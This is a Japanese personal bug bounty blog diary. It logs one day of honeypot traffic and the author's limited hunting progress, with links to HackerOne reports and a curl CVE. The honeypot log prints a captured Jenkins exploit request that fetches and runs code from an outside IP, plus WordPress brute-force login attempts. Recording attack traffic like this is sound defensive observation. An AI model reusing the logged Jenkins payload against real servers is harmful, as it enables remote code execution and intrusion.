【BugBounty】 2019年6月2日 活動日記【Honeypot】

f:id:NickShadows:20190602211528j:plain:w600

※hackerone経由で公式にwebの調査をしています。

ハニーポット

トップ画面

f:id:NickShadows:20190602211748p:plain


直近1ヶ月折れ線グラフ

f:id:NickShadows:20190602211809p:plain


GETリクエスト
no uri Co
1 / 42
2 /favicon.ico 4
3 *1 2
4 /echo.php 2
5 /wp-login.php 2
6 /.well-known/security.txt 2
7 /robots.txt 2
8 /sitemap.xml 2
9 /testget?q=23333&port=80 1
10 /admin-scripts.asp 1

*1

/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27NsGdMJsD%27,%20root=%27http[:]//185.162.235.211%27)%0a@Grab(group=%27package%27,%20module=%27NsGdMJsD%27,%20version=%271%27)%0aimport%20NsGdMJsD;


POSTリクエスト
no uri request_body Co
1 /wp-login.php log=&pwd=admin&wp-submit=Log In&redirect_to=http[:]://52.14.60.236/wp-admin/&testcookie=1 1
2 /xmlrpc.php <?xml version="1.0"?>system.multicallmethodNamewp.getUsersBlogsparamsadmin 1
3 /xmlrpc.php <?xml version="1.0"?>system.multicallmethodNamewp.getUsersBlogsparams[login][login] 1
4 /wp-login.php log=&pwd=&wp-submit=Log In&redirect_to=http[:]://52.14.60.236/wp-admin/&testcookie=1 1


pypmyadminユーザー

アクセスなし


pypmyadminパスワード

アクセスなし


wordpressユーザー
no user Co
1 1


wordpressパスワード
no pwd Co
1 admin 1


tomcatユーザー

アクセスなし


tomcatパスワード

アクセスなし


直近24時間新着アクセス

なし


まとめ

特にない日でした。


バグバウンティ

やろうとしたこと
  1. js難読化解読ツールの検証
  2. 実践
やったこと
  1. 実践

1.実践

1~2サイトやりましたが、進捗はありませんでした。
HPスタイルだと、パラメータが少なくてどうすればいいか分かりませんね。


また、頻繁にJSONでデータのやり取りをしているのがありましたが、あれはどうすればいいんでしょう。
こちらからアクセスが出来ないなら、気にしなくてもよさそう。


ひとまず、jsをLinkFinderに通してみました。
結局、結果の意味はわかりませんが、少しずつ会得していきます。


何をしたか不明なので、今日学んだこと、成長したことを箇条書きで残しておくようにします。

今日の成長

  1. LinkFinderに少し慣れた
  2. HPスタイルがパラメータが少ないことを知った
  3. パラメータが少ないとどうしていいかわからなくなることを知った
  4. 行き交うJSONをどうしたらいいかわからないことを知った
次やりたいこと
  1. js難読化解読ツールの検証
  2. 実践

気になったニュースなど

www.humblebundle.com

ハッキング分野における、海外の本の格安キャンペーン?みたいなもの。
IDAやリバースエンジニアリングなど、CTFに非常に有効そうなセット。
私は15ドルですべて開放しました。
でも、使うのはBug Hunters Diaryくらいです。




hackerone.com

Hackeroneのビジネスロジックエラー。
正直、何書いてあるかさっぱりわかりませんでした。




hackerone.com

curlのヒープオーバーフロー。
CVEもつけられてました。


CVE

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5436



nvd.nist.gov





ソースコード解析でのバグ報告。
こちらも正直何書いてあるかさっぱりわかりませんでしたが、ソースコードの原因の箇所を明確に指摘し、検証用のサーバスクリプトまでつけているところがすごいと思いました。
検証方法もありましたので、誰でも再現できそうだと思いました。
厳密に報告してあるのに、200ドルなんだーとは思いました。